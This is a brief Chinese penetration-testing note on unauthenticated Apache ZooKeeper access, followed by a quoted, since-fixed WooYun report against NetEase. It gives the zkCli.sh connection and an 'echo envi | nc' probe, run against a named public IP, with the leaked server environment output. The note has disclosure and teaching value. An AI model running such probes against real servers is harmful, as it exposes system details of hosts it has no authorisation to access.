ZooKeeper是一個分布式的,開放源碼的分布式應用程序協調服務,是Google的Chubby一個開源的實現,它是集群的管理者,監視着集群中各個節點的狀態根據節點提交的反饋進行下一步合理操作。最終,將簡單易用的接口和性能高效、功能穩定的系統提供給用戶,默認端口2181。
利用:
連接:
./zkCli.sh -server ip:port
獲取系統環境
echo envi|nc ip port
烏雲網易案例:
oot@kali:~# echo envi |nc 60.191.83.13 2181
Environment:
zookeeper.version=3.4.6-1569965, built on 02/20/2014 09:09 GMT
host.name=localhost
java.version=1.7.0_79
java.vendor=Oracle Corporation
java.home=/opt/jdk1.7.0_79/jre
java.class.path=/root/zookeeper-3.4.6/bin/../build/classes:/root/zookeeper-3.4.6/bin/../build/lib/*.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-log4j12-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-api-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/netty-3.7.0.Final.jar:/root/zookeeper-3.4.6/bin/../lib/log4j-1.2.16.jar:/root/zookeeper-3.4.6/bin/../lib/jline-0.9.94.jar:/root/zookeeper-3.4.6/bin/../zookeeper-3.4.6.jar:/root/zookeeper-3.4.6/bin/../src/java/lib/*.jar:/root/zookeeper-3.4.6/bin/../conf:
java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.io.tmpdir=/tmp
java.compiler=<NA>
os.name=Linux
os.arch=amd64
os.version=3.2.0-4-amd64
user.name=root
user.home=/root
user.dir=/root/zookeeper-3.4.6/bin
漏洞證明:
修復方案:
版權聲明:轉載請注明來源 路人甲@烏雲
漏洞回應
廠商回應:
危害等級:低
漏洞Rank:3
確認時間:2016-04-11 10:21
廠商回復:
漏洞已修復,感謝您對網易的關注!
最新狀態:
暫無